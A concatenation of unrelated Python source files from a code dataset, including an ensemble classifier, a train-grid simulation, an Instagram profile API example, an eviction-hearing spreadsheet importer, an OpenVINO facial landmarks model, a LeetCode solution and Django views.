unlabel_mat_ohe = ohe.transform(np.argmax(unlabel_mat, axis=1).reshape(-1, 1)).toarray()
lu_mat_ohe = np.concatenate([label_mat_ohe, unlabel_mat_ohe], axis=0)
return pd.DataFrame(data=lu_mat_ohe, index=total_indices), train_acc
else:
unlabel_mat_prob = unlabel_mat
lu_mat_prob = np.concatenate([label_mat_prob, unlabel_mat_prob], axis=0)
return pd.DataFrame(data=lu_mat_prob, index=total_indices), train_acc
def is_nonnegative_integer(x_feats):
is_nonnegative = (x_feats >= 0).all()
is_integer = True
for feat in x_feats:
feat_int_sum = np.array(feat, dtype=np.int).sum()
feat_sum = np.array(feat, dtype=np.float).sum()
is_integer = (feat_int_sum == feat_sum)
if is_integer is False:
break
return is_nonnegative and is_integer
| StarcoderdataPython |
1606631 | <filename>ensemble_classification_wrapper.py
import random
import numpy as np
from scipy import stats
import sys
sys.path.insert(0, "../NumPy-based-Logistic-Regression/")
from numpy_based_0hl_neural_network import NumPyBased0hlNeuralNetwork
sys.path.insert(0, "../NumPy-based-Neural-Network/")
from numpy_based_neural_network import NumPyBasedNeuralNetwork
class EnsembleClassificationWrapper(object):
def __init__(self, type="logistic_regression", configuration=None, number_models=10, debug_mode=False):
self.__models = [None for i in range(number_models)]
for i in range(number_models):
if type == "logistic_regression":
self.__models[i] = NumPyBased0hlNeuralNetwork()
elif type == "neural_network":
L = configuration[0]
dimensions = configuration[1]
activations = configuration[2]
self.__models[i] = NumPyBasedNeuralNetwork(L=L, dimensions=dimensions, activations=activations, debug_mode=debug_mode)
else:
if debug_mode:
print("Error: unsupported type of model")
print("\tStack trace: EnsembleClassificationWrapper.__init__()")
break
def bag(self, X, Y, k, debug_mode=False):
if X.shape[1] != Y.shape[1]:
if debug_mode:
print("Error: inconsistent number of examples")
print("\tStack trace: EnsembleClassificationWrapper.bag()")
return None
# get the number of examples
m = Y.shape[1]
# sanity check: compare k and m
if k > m:
k = m
if debug_mode:
print("Warning: the number of bags, k, cannot be larger than the number of examples, m; k is automatically reset to m")
print("\tStack trace: EnsembleClassificationWrapper.bag()")
# bag indices of examples randomly without replacement into different bags
index_pool = [i for i in range(m)]
index_bags = []
for i in range(k - 1):
index_bag = []
for j in range(m // k):
index_chosen = random.choice(index_pool)
index_pool.remove(index_chosen)
index_bag.append(index_chosen)
index_bags.append(index_bag)
index_bags.append(index_pool)
# bag examples into different bags based on index_bags
X_bags = []
Y_bags = []
for index_bag in index_bags:
X_bags.append(X[:, index_bag])
Y_bags.append(Y[:, index_bag])
return (X_bags, Y_bags)
def fit(self, X, Y, batch_size=1, debug_mode=False):
if X.shape[1] != Y.shape[1]:
if debug_mode:
print("Error: inconsistent number of examples")
print("\tStack trace: EnsembleClassificationWrapper.fit()")
return False
X_bags, Y_bags = self.bag(X=X, Y=Y, k=len(self.__models), debug_mode=debug_mode)
for i in range(len(self.__models)):
X_bag = X_bags[i % len(X_bags)]
Y_bag = Y_bags[i % len(Y_bags)]
self.__models[i].fit(X=X_bag, Y=Y_bag, batch_size=5, debug_mode=debug_mode)
return True
def predict(self, X, debug_mode=False):
# initialize the NumPy array for ensemble prediction
Y_ensemble = np.empty((len(self.__models), X.shape[1]))
# each internal model make a prediction in regular representation
for i in range(len(self.__models)):
Y_regular = self.__models[i].predict(X=X, debug_mode=debug_mode)
Y_ensemble[i, :] = Y_regular
# use majority rule to make the final prediction
Y_majority = np.array(stats.mode(Y_ensemble, axis=0)[0]).reshape(1, X.shape[1])
return Y_majority
| StarcoderdataPython |
1638141 | <reponame>raphaeldeimel/phastapromep
__all__ = ['_phastapromep']
from ._phastapromep import *
| StarcoderdataPython |
15740 | <filename>trainLib.py
import math
#constants and globals
background = '0'
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
dirs = {0 : "NORTH", 1 : "EAST", 2 : "SOUTH", 3 : "WEST"}
class CellElement(): #CellELement Interface for the subclasses
#Subclasses: RegularRoad, Switch, LevelCrossing, Bridge, Station
def setPosition(self, x, y):
return
def setOrientation(self, a):
return
def switchState(self):
return
def getDuration(self, entdir):
return
def getStop(self, entdir):
return
def nextCell(self,entdir):
return
def getView():
return
# Additional Interface methods added by us
def setCwRot(self):
return
def canEnter(self, entdir): # it checks the availability of the next cell in case of there is another train.
return
def getPos(self):
return
class GameGrid():
def __init__ (self, row, col):
self.row = row
self.col = col
self.grid = []
self.view = []
# Train refs to draw them on screen, on top of the tile view.
self.activeTrains = []
#default grid creation filled with background
for i in range(0, row):
self.grid.append([])
self.view.append([])
for j in range(0, col):
c = RegularRoad(True, self.grid)
#Eventhough it assigns a RegularRoad to every cell, we make it background changing the visuals of the cell. (bkz. CellElement.visuals)
#We choose it to implemet that way to avoid a creation for empty subclass for background cells and not to make code more complex.
c.visuals = '_'
c.setPosition(i,j)
self.grid[i].append(c)
#view grid is seperate than the actual grid. It keeps the visulas and used for display issues.
self.view[i].append(c.visuals)
def addElement(self, cellElm, row, col):
cellElm.setPosition(row, col)
self.grid[row][col] = cellElm
self.view[row][col] = cellElm.visuals
return
def removeElement(self, row, col):
empty = RegularRoad(True, self.grid) # (bkz. GameGrid.__init___ (): line 51)
empty.visuals = '_'
self.grid[row][col] = empty
self.view[row][col] = '_' # visual for background
return
def display(self):
for i in range(0,self.row):
for j in range(0, self.col):
print(self.view[i][j], end=' ')
print('\n')
def isOutOfBounds(self, i, j): #check whether the given positions exists or not
if(i >= self.row or j >= self.col or i < 0 or j < 0):
return True
return False
def updateView(self): # We provide this functionality by updtaing the view grid and display function where it needed.
return
def startSimulation(self):
return
def setPauseResume(self):
return
def stopSimulation(self):
return
def spawnTrain(self, wagonCount, row, col): # Creates trains at given row and column
if(self.isOutOfBounds(row,col)):
print("invalid spawn pos for train.", row, col)
return
spawnCell = self.grid[row][col]
t = Train(wagonCount, spawnCell, self)
self.registerTrain(t) # register train for the grid.
#For the phase1 it is not that functional but when we have more trains in later phases it will be used as it supposed to.
return t
def registerTrain(self, train):
self.activeTrains.append(train)
return
def trainDisappear(self,train):
self.activeTrains.remove(train)
return
def hasTrain(self, row, col): #it checks whether there is a train in the given cell or not
for t in self.activeTrains:
if(t.enginePosRow == row and t.enginePosCol == col):
return True
return False
class RegularRoad(CellElement):
# RegularRoad can be either a straight road or a right turn.
# We class them as this since they both have one entrance and exit.
def __init__(self, isStraight, gridRef):
self.visuals = '_'
self.rotationCount = 0
self.myGrid = gridRef #needs grid reference since we have to reach there to update grid.
self.row = -1
self.col = -1
self.isRegular = isStraight # if it is not straigt, it is a right turn. We exclude left turn here since it is the one time rotated version of right turn.
# For the sake of simplicity, we define left turn by rotating the right turn.
if(isStraight):
self.dir1 = SOUTH
self.dir2 = NORTH
self.visuals = '|'
else: # default is a Right turn as in the pdf.
# rotate this one time CW to get a left turn if needed
self.visuals = 'R'
self.dir1 = SOUTH
self.dir2 = EAST
return
def makeLeftTurn(self): # used for make a left turn from a right turn.
self.visuals = 'L'
self.rotationCount = 0 # When we rotate to get left turn the count has been increased.
# rotation count is assigned to 0 again since it should be a base case.
self.setOrientation( 1, False)
return self
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self): #it assigns the new directions CW of the roads.
self.dir1 = (self.dir1 + 1) % 4
self.dir2 = (self.dir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True): #if incrRot is given False, it doesn't update the rotation amount. It is used for left turn object orientation.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4 # else assign the value in mod 4 to be able to detect new directions correctly.
for i in range(0, rotationAmount):
self.setCwRot() #does the real job
return
def switchState(self):
return
def getDuration(self, entdir): # default 1 for Regular Road
return 1
def getStop(self, entdir): # default 0 for Regular Road since not stop there
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir values.
self.exitDir = None
#if the given direction is the dir1 assign dir2 as exitDir and vice verca.
if(self.dir1 == entdir):
self.exitDir = self.dir2
elif self.dir2 == entdir:
self.exitDir = self.dir1
else: # if the given direction is not valid, exit
return None
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: # no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
return (self.dir1 == entdir or self.dir2 == entdir)
class SwitchRoad(CellElement):
#There are three types of switchRoad. Explained in lines:237, 241, 246
def __init__(self, typeofSwitch, gridRef):
# create 'pieces' of the switch using RegularRoad since switches are just the combinations of them.
self.visuals = 'S'
self.myGrid = gridRef
self.rotationCount = 0
self.switchType = typeofSwitch # int value 1,2,3
self.pieces = {'direct' : RegularRoad(True, gridRef)} #We kept the pieces of the switches according to its type.
#for example, switchType-3 has one direct, one rightTurn and one leftTurn.
#since all switches has one RegulaarRoad in common, it is added the dictionary by default.
self.activePiece = self.pieces['direct'] # Keeps track of which part of the switch is active.
#Changed by switchState(). Defualt straight piece is the active one.
self.enter = SOUTH #default switch entrance location is south for all type of switches
self.switchDelay = 2 #used for make train slower in switches.
if(self.switchType == 1):
# straight + right turn
self.pieces['rightTurn'] = RegularRoad(False, gridRef)
elif(self.switchType == 2):
# straight + left turn
self.pieces['leftTurn'] = RegularRoad(False, gridRef) #As explained in RegularRoad class, it is cretaed as a right turn first.
self.pieces['leftTurn'].setOrientation(1, False) #Then rotate it one time and not update the rotationCount.
elif(self.switchType == 3):
# straight + right turn + left turn
self.pieces['rightTurn'] = RegularRoad(False, gridRef)
self.pieces['leftTurn'] = RegularRoad(False, gridRef)
self.pieces['leftTurn'].setOrientation(1, False)
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self):
# straightforward 90 degree rotation: S->W, W -> N and so on.
self.enter = (self.enter + 1) % 4
if(self.switchType == 1):
self.pieces['rightTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
elif(self.switchType == 2):
self.pieces['leftTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
else: #switchType is 3
self.pieces['rightTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
self.pieces['leftTurn'].setOrientation(1)
return
def setOrientation(self, rotationAmount):
# rotate 90 degrees CW, directly change dir variables.
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def switchState(self):
# defined only for switch roads. Changes which piece is active.
if(self.switchType == 1):
# if the direct is the active one, make the rightTurn active, and vice verca.
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['rightTurn']
else:
self.activePiece = self.pieces['direct']
elif(self.switchType == 2):
# if the direct is the active one, make the leftTurn active, and vice verca.
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['leftTurn']
else:
self.activePiece = self.pieces['direct']
elif(self.switchType == 3):
#change state in CW order starting with direct. direct->rightTurn->leftTurn->direct
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['rightTurn']
elif(self.activePiece == self.pieces['rightTurn']):
self.activePiece = self.pieces['leftTurn']
else:
self.activePiece = self.pieces['direct']
return
def getDuration(self, entdir):
# add switch delay to default duration of the active piece
return self.activePiece.getDuration(entdir) + self.switchDelay
def getStop(self, entdir):
# Train does NOT stop on this cell.
return self.activePiece.getStop(entdir)
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# use activePiece to decide on exit direction if any
# if the entrance is default direction, set exitDir according to active piece
# else, if the entrance is one of the NotSwitched directions, treat it as a RegularRoad.
if(entdir == self.enter):
self.exitDir = None
if(self.activePiece.dir1 == entdir):
self.exitDir = self.activePiece.dir2
elif(self.activePiece.dir2 == entdir):
self.exitDir = self.activePiece.dir1
else:
print("invalid entry direction for this cell.")
return None
else:
self.exitDir = self.enter
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getView(self):
return self.visuals
def getPos(self):
return self.row, self.col
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
canEnter = False
res = self.activePiece.canEnter(entdir)
canEnter = canEnter or res
return canEnter
class LevelCrossing(CellElement):
# if all are in the '+' shape as shown in pdf, then rotation does not matter for these tiles.
def __init__(self, gridRef):
self.visuals = '+'
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
# has all 4 directions.
# always exit entdir+2 in mod 4. So, no need the assign directions.
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
# since rotation does not make sense, just incrementing the rotationCount is enough.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
return
def getDuration(self, entdir):
return 1
def getStop(self, entdir):
# return 0(no waiting) if no other train parts are at this cell
# if any trains, calculate upper bound on how long we should wait for them. possible deadlock here
# fro Phase1, 0 is enough. Remaining will be impleneted in later phases.
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
# has all 4 directions. always exit entdir+2 in mod 4.
self.exitDir = (entdir + 2) % 4
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
# has all 4 directions. can always enter EXCEPT when there is another train here.
if(self.myGrid.hasTrain(self.row, self.col)):
return False
else:
return True
class BridgeCrossing(CellElement):
# if all are in the '+' shape as shown in pdf, then rotation does not matter for these tiles on phase1.
def __init__(self, gridRef):
self.visuals = '\u03A9' #visual is the omega sign
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
# Bridge is on West-East road segment as default.
# other regular road dir can be deduced from these two.
self.bridgeDir1 = WEST
self.bridgeDir2 = EAST
# all 4 directions always exit entdir+2 in mod 4.
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self):
self.bridgeDir1 = (self.bridgeDir1 + 1) % 4
self.bridgeDir2 = (self.bridgeDir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
#rotation makes sense here, we change the bridge's segment.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def getDuration(self, entdir):
return 1
def getStop(self, entdir):
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
# has all 4 directions. always exit entdir+2 in mod 4.
self.exitDir = (entdir + 2) % 4
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
# has all 4 directions. can always enter since bridge prevents from a collision.
return True
class Station(CellElement):
#It is just like a straight regularRoad, but for simplcity we don't create it using RegularRoad class.
def __init__(self, gridRef):
self.visuals = '\u0394' #the visual is the delta sign.
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
#default dir values
self.dir1 = SOUTH
self.dir2 = NORTH
return
def setPosition(self, row, col):
self.row = row
self.col= col
return
def setCwRot(self):
self.dir1 = (self.dir1 + 1) % 4
self.dir2 = (self.dir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
#like a straight road, increment rotationcount and rotate the directions rotationAmount times.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def switchState(self):
return
def getDuration(self, entdir): #since it will be stopped in station, add the deault value to the stop value.
return 1 + self.getStop(entdir)
def getStop(self, entdir):
return 10
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
self.exitDir = None
if(self.dir1 == entdir):
self.exitDir = self.dir2
elif self.dir2 == entdir:
self.exitDir = self.dir1
else:
return None
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
return (self.dir1 == entdir or self.dir2 == entdir)
class Train():
#GameGrid takes care of the created trains and their effcts in the grid view.
def __init__(self, nWagons, cell : CellElement, gridRef : GameGrid):
self.wagonCount = nWagons
self.totalLength = nWagons+1 # cars + train engine
self.currCell = cell
self.wagonCountPerCell = 2 # effectively, each 'car' takes 1/2 of a cell.
self.gridRef = gridRef # ref to GameGrid to be in communication.
self.coveredCellCount = math.ceil(self.totalLength / self.wagonCountPerCell)
# one of: "moving", "movingReverse", "stopped"
self.status = "moving"
self.enginePosRow, self.enginePosCol = cell.getPos()
return
def enterCell(self, nextCell : CellElement, entdir):
#it locates the train in a given cell position using entdir value.
self.currDir = entdir
self.enginePosRow, self.enginePosCol = nextCell.getPos()
self.currCell = nextCell
def advance(self):
#it moves the train to the available next cell
nextCell = self.currCell.nextCell(self.currDir)
self.currDir = (self.currCell.exitDir + 2) % 4 #when we go to nextcell, exitDir of previous cell become the entDir for the current cell.
#For example, when we move to cell at south, the entdir becomes the north, which is 2 direction away from the exitDir of previous cell.
if(nextCell is None):
# self.gridRef.trainDisappear(self), will be implemented
return False
elif(nextCell.visuals == '_'):
#nextcell is background
return False
else:
# update pos
self.currCell = nextCell
self.enginePosRow, self.enginePosCol = nextCell.getPos()
return True
def getEnginePos(self):
return self.enginePosRow, self.enginePosCol
def getStatus(self):
return self.status
def getGeometry(self):
# Gets the geometry of the train path, engine and cars.
# Implemented in later phases where full train needs to be displayed on a curve during simulation
return
| StarcoderdataPython |
1752380 | # Counter 클래스는 아래와 같이 제너레이터로 변경할 수 있습니다.
# yield 는 iterator 를 추상화 하기 위해 Python 2.2 에 추가되었습니다.
def gen_1_to_5():
yield 1
yield 2
yield 3
yield 4
yield 5
counter = gen_1_to_5()
print(type(counter))
print(next(counter))
print(next(counter))
print(next(counter))
print(next(counter))
print(next(counter))
# StopIteration 발생
# print(next(counter))
# 리스트로 바로 변경할 수 있습니다.
print(list(gen_1_to_5()))
| StarcoderdataPython |
1783395 | <filename>example/instagram.py
from justgood import imjustgood
api = imjustgood("YOUR_APIKEY_HERE")
data = api.instagram("the.autobots_corp")
print(data)
# EXAMPLE GET CERTAIN ATTRIBUTES
result = "ID : {}".format(data["result"]["id"])
result += "\nUsername : {}".format(data["result"]["username"])
result += "\nFullname : {}".format(data["result"]["fullname"])
result += "\nBiography : {}".format(data["result"]["biography"])
result += "\nWebsite : {}".format(data["result"]["website"])
result += "\nPrivate : {}".format(data["result"]["private"])
result += "\nVerified : {}".format(data["result"]["verified"])
result += "\nPost : {}".format(data["result"]["post"])
result += "\nFollower : {}".format(data["result"]["follower"])
result += "\nFollowing : {}".format(data["result"]["following"])
result += "\n\nPicture :\n{}".format(data["result"]["picture"])
result += "\n\nProfile :\n{}".format(data["result"]["profile"])
if data["result"]["lastpost"] != []:
number = 0
result += "\n\nLastpost"
for a in data["result"]["lastpost"]:
number += 1
result += "\n{}. {}".format(number, a["caption"])
result += "\n{}".format(a["url"])
result += "\n Like : {}".format(number, a["like"])
result += "\n Comment : {}".format(number, a["comment"])
result += "\n Created : {}".format(a["created"])
result += "\n PageUrl : {}".format(a["page"])
print(result)
| StarcoderdataPython |
1672876 | <filename>eviction_tracker/detainer_warrants/judgment_imports.py
from .models import db
from .models import Attorney, Courtroom, Defendant, DetainerWarrant, District, Judge, Hearing, Judgment, Plaintiff, detainer_warrant_defendants
from .util import get_or_create, normalize, open_workbook, dw_rows, district_defaults
from sqlalchemy.exc import IntegrityError, InternalError
from sqlalchemy.dialects.postgresql import insert
from decimal import Decimal
from datetime import date, datetime
from dateutil.rrule import rrule, MONTHLY
COURT_DATE = "Court Date"
DOCKET_ID = "Docket #"
COURTROOM = "Courtroom"
PLAINTIFF = "Plaintiff"
PLAINTIFF_ATTORNEY = "Pltf Lawyer"
DEFENDANT = "Defendant"
DEFENDANT_ATTORNEY = "Def Lawyer"
DEFENDANT_ADDRESS = "Def. Address"
REASON = "Reason"
AMOUNT = "Amount"
MEDIATION_LETTER = "\"Mediation Letter\""
NOTES = "Notes (anything unusual on detainer or in "
JUDGEMENT = "Judgement"
JUDGE = "Judge"
JUDGEMENT_BASIS = "Judgement Basis"
def _from_workbook(defaults, court_date, raw_judgment):
judgment = {k: normalize(v) for k, v in raw_judgment.items()}
docket_id = judgment[DOCKET_ID]
if not bool(docket_id):
return
address = judgment[DEFENDANT_ADDRESS] or "unknown"
hearing = Hearing.query.filter_by(
docket_id=docket_id, _court_date=court_date).first()
if hearing and hearing.address != "unknown":
hearing.update(address=address)
db.session.commit()
def from_workbook(workbook_name, limit=None, service_account_key=None):
wb = open_workbook(workbook_name, service_account_key)
start_dt = date(2021, 3, 1)
end_dt = date(2021, 11, 30)
worksheets = [wb.worksheet(datetime.strftime(dt, '%B %Y'))
for dt in rrule(MONTHLY, dtstart=start_dt, until=end_dt)]
defaults = district_defaults()
for ws in worksheets:
all_rows = ws.get_all_records()
stop_index = int(limit) if limit else all_rows
judgments = all_rows[:stop_index] if limit else all_rows
court_date = None
for judgment in judgments:
court_date = judgment[COURT_DATE] if judgment[COURT_DATE] else court_date
_from_workbook(defaults, court_date, judgment)
| StarcoderdataPython |
3202611 | <reponame>DhruvKinger/Pointer-Controller
'''
This is a sample class for a model. You may choose to use it as-is or make any changes to it.
This has been provided just to give you an idea of how to structure your model class.
'''
import cv2
import numpy as np
from openvino.inference_engine import IECore,IENetwork
class FacialLandmarksDetectionModel:
'''
Class for the Face Detection Model.
'''
def __init__(self, model_name, device='CPU', extensions=None):
self.model_name = model_name
self.device = device
self.extensions = extensions
self.model_structure = self.model_name
self.model_weights = self.model_name.split('.')[0]+'.bin'
self.plugin = None
self.network = None
self.exec_net = None
self.input_name = None
self.input_shape = None
self.output_names = None
self.output_shape = None
try:
self.model=IENetwork(self.model_structure, self.model_weights)
except Exception as e:
raise ValueError("Could not Initialise the network. Have you enterred the correct model path?")
self.input_name=next(iter(self.model.inputs))
self.input_shape=self.model.inputs[self.input_name].shape
self.output_name=next(iter(self.model.outputs))
self.output_shape=self.model.outputs[self.output_name].shape
def load_model(self):
self.plugin=IECore()
supported_layers = self.plugin.query_network(network=self.model, device_name=self.device)
unsupported_layers = [l for l in self.model.layers.keys() if l not in supported_layers]
if len(unsupported_layers)!=0:
print("unsupported layers found")
exit(1)
self.exec_net=self.plugin.load_network(network=self.model,device_name=self.device,num_requests=1)
def predict(self, image):
self.processed_image=self.preprocess_input(image)
outputs = self.exec_net.infer({self.input_name:self.processed_image})
coords = self.preprocess_output(outputs)
h=image.shape[0]
w=image.shape[1]
coords = coords* np.array([w, h, w, h])
coords = coords.astype(np.int32)
l_xmin=coords[0]-10
l_xmax=coords[0]+10
l_ymin=coords[1]-10
l_ymax=coords[1]+10
r_xmin=coords[2]-10
r_xmax=coords[2]+10
r_ymin=coords[3]-10
r_ymax=coords[3]+10
left_eye = image[l_ymin:l_ymax, l_xmin:l_xmax]
right_eye = image[r_ymin:r_ymax, r_xmin:r_xmax]
eye_coords = [[l_xmin,l_ymin,l_xmax,l_ymax], [r_xmin,r_ymin,r_xmax,r_ymax]]
return left_eye, right_eye, eye_coords
def check_model(self):
raise NotImplementedError
def preprocess_input(self, image):
image_ct = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
self.image=cv2.resize(image_ct,(self.input_shape[3],self.input_shape[2])) ## cv2.resize(frame, (w, h))
self.image=self.image.transpose((2, 0, 1))
self.image=self.image.reshape(1, *self.image.shape)
return self.image
def preprocess_output(self, outputs):
res=outputs[self.output_name][0]
lx = res[0].tolist()[0][0]
ly = res[1].tolist()[0][0]
rx = res[2].tolist()[0][0]
ry = res[3].tolist()[0][0]
return(lx,ly,rx,ry)
| StarcoderdataPython |
172468 | <filename>leetcode/easy/1185-Day_of_week.py
"""
Leetcode #1185
"""
class Solution:
# if we know that 1/1/1971 was Friday
def dayOfTheWeek(self, day: int, month: int, year: int) -> str:
isLeapYear = lambda x: 1 if x % 400 == 0 or (x % 4 == 0 and x % 100 != 0) else 0
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
days = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
numDays = -1 # start from 1971-01-01, remove that day
for i in range(1971, year):
numDays += 365 + isLeapYear(i)
numDays += sum(months[:month-1]) + day + isLeapYear(year)
# Adding 5 because 1/1/1971 was Friday
return days[(5+numDays)%7]
# without knowing 1/1/1971 was friday
# but we know what today is
def dayOfTheWeek_2(self, day: int, month: int, year: int) -> str:
# today of 6th june day is saturday
# so starting days from Saturday
days = ["Saturday", "Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday"]
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def isLeapYear(year):
return 1 if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else 0
def getDay(day, month, year):
numDays = 0
# get num days till last year
for y in range(year-1, 1970, -1):
numDays += 365 + isLeapYear(y)
numDays += sum(months[:month-1])
numDays += day
if month > 2:
numDays += isLeapYear(year)
return numDays
k = getDay(6, 6, 2020) # today is saturday
d = getDay(day, month, year)
return days[(d-k)%7]
if __name__ == "__main__":
solution = Solution()
assert solution.dayOfTheWeek(31, 8, 2019) == "Saturday"
assert solution.dayOfTheWeek(18, 7, 1999) == "Sunday"
assert solution.dayOfTheWeek_2(31, 8, 2019) == "Saturday"
assert solution.dayOfTheWeek_2(18, 7, 1999) == "Sunday"
| StarcoderdataPython |
59113 | <gh_stars>1-10
from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext, loader
from .models import *
def index(request):
# latest_question_list = Question.objects.order_by('-pub_date')[:5]
template = loader.get_template('core/index.html')
context = RequestContext(request)
return HttpResponse(template.render(context))
| StarcoderdataPython |
4808653 | #!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from django import forms
from django.apps import apps
from django.conf import settings
from django.conf.urls import patterns, url, include
from django.contrib.admin.sites import AlreadyRegistered
from django.contrib.admin.sites import NotRegistered
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ImproperlyConfigured
from django.db.utils import OperationalError
from django.utils.module_loading import module_has_submodule
from django.utils.module_loading import import_module
from django.utils import six
from django.utils.text import slugify
from .apps import BMFConfig
from .models import Configuration
from .views import ModuleIndexView
from .views import ModuleReportView
from .views import ModuleCreateView
from .views import ModuleDeleteView
from .views import ModuleCloneView
from .views import ModuleAutoDetailView
from .views import ModuleUpdateView
from .views import ModuleWorkflowView
from .views import ModuleFormAPI
import copy
import sys
import logging
logger = logging.getLogger(__name__)
SETTING_KEY = "%s.%s"
APP_LABEL = BMFConfig.label
class DjangoBMFSetting(object):
def __init__(self, app_label, name, field):
self.app_label = app_label
self.name = name
self.field = field
